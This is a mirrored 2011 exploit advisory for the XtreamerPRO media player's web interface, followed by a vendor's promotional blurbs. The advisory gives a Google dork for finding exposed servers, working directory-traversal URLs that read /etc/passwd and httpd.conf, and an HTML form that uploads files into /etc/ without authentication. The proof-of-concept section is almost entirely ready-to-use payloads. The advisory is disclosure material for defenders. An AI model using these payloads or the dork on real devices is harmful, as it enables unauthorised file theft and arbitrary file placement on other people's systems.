Lucene search
K

XtreamerPRO Media Player Directory Traversal / Authentication Bypass

🗓️ 17 May 2011 00:00:00Reported by Itzik ChenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

XtreamerPRO Media Player Directory Traversal / Authentication Bypass vulnerabilit

Code
`# Exploit Title: XtreamerPRO Media-player and streamer multiple vulnerabilities  
# Google Dork: intitle:Xtreamer Media Server + "2009 Xtreamer.net, All right reserved."  
# Date: 15/05/2011  
# Author: Itzik Chen  
# Software Link: www.xtreamer.net  
# Version: ver 2.6.0, 2.7.0  
# Tested on: Windows XP SP3 Eng  
  
  
  
Summary  
================  
  
XtreamerPro is a popular media-player and streamer with  
an optional web interface management.  
  
  
  
Description  
================  
  
XtreamerPro suffers from a directory traversal with  
appending the '/' character in the HTTP GET method of the  
affected host address. XtreamerPro also prone to an  
authentication bypass vulnerability. This vulnerability  
can be exploited by remote attackers to access sensitive  
data on the server without being authenticated. The attacker  
can also upload files to any location on the server, without  
being authenticated, using a multipart/form-data post.  
  
  
  
  
Proof of Concept  
================  
  
directory traversal:  
  
http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/passwd  
http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/httpd.conf  
  
  
  
  
Authentication bypass:  
  
http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=passwd  
http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=httpd.conf  
  
  
  
Authentication bypass - upload file:  
  
<form id="form1" name="write_form" action="http://192.168.2.100/upload_file.php?dir=/%2f../%2f../etc/" method="post" enctype="multipart/form-data">  
<INPUT TYPE=FILE name="Filedata" id="Filedata">  
<input type=submit>  
</form>  
  
  
  
DEMO video:  
http://www.youtube.com/watch?v=QZtiuYyA8XU  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation